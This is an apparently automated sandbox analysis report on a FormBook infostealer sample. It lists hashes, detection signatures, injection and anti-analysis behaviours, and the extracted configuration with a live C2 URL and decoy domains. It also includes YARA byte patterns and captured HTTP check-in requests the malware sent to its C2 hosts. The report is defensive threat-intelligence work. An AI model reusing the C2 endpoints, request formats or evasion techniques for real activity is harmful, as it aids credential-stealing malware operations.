Play interactive tour

Edit tour

Analysis Report INv02938727.exe

Overview

General Information

Sample Name:	INv02938727.exe
Analysis ID:	411836
MD5:	a3b74acf9723e53d6caea736faae9708
SHA1:	2714e0ec97d81921312f0db6470dc40f55d16b96
SHA256:	f8e8f64bb17ffb2fea18b7671602a76a8b5734607c7a7ae035dce8eed8381a74
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

INv02938727.exe (PID: 4852 cmdline: 'C:\Users\user\Desktop\INv02938727.exe' MD5: A3B74ACF9723E53D6CAEA736FAAE9708)

INv02938727.exe (PID: 3632 cmdline: C:\Users\user\Desktop\INv02938727.exe MD5: A3B74ACF9723E53D6CAEA736FAAE9708)

explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autochk.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)

control.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 7088 cmdline: /c del 'C:\Users\user\Desktop\INv02938727.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10b190:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10b40a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1379b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x137c2a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x116f2d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14374d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x116a19:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x143239:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11702f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14384f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1171a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1439c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10be22:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x138642:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x115c94:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1424b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x10cb1b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x13933b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x11cbcf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1493ef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x11dbd2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x119cb1:$sqlite3step: 68 34 1C 7B E1 0x119dc4:$sqlite3step: 68 34 1C 7B E1 0x1464d1:$sqlite3step: 68 34 1C 7B E1 0x1465e4:$sqlite3step: 68 34 1C 7B E1 0x119ce0:$sqlite3text: 68 38 2A 90 C5 0x119e05:$sqlite3text: 68 38 2A 90 C5 0x146500:$sqlite3text: 68 38 2A 90 C5 0x146625:$sqlite3text: 68 38 2A 90 C5 0x119cf3:$sqlite3blob: 68 53 D8 7F 8C 0x119e1b:$sqlite3blob: 68 53 D8 7F 8C 0x146513:$sqlite3blob: 68 53 D8 7F 8C 0x14663b:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: INv02938727.exe PID: 4852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.INv02938727.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INv02938727.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INv02938727.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
2.2.INv02938727.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INv02938727.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INv02938727.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: INv02938727.exe	Virustotal: Detection: 61%	Perma Link
Source: INv02938727.exe	Metadefender: Detection: 35%	Perma Link
Source: INv02938727.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: INv02938727.exe

Joe Sandbox ML: detected

Source: 2.2.INv02938727.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: INv02938727.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: INv02938727.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INv02938727.exe, control.exe
Source:	Binary string: control.pdbUGP source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 4x nop then pop esi	2_2_004172E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 4x nop then pop ebx	2_2_00407B06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 4x nop then pop edi	2_2_00416C87
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	15_2_02E272E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx	15_2_02E17B06
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	15_2_02E26C87

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.hometowncashbuyersgroup.com/kkt/

Source: global traffic	HTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1Host: www.manifestarz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1Host: www.funtimespheres.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1Host: www.sequenceanalytica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 184.168.131.241 184.168.131.241

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: global traffic	HTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1Host: www.manifestarz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1Host: www.funtimespheres.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1Host: www.sequenceanalytica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.manifestarz.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 12 May 2021 13:33:02 GMTContent-Type: text/htmlContent-Length: 355Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 2f 22 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><meta http-equiv="refresh" content="0; url=/"></body></html>

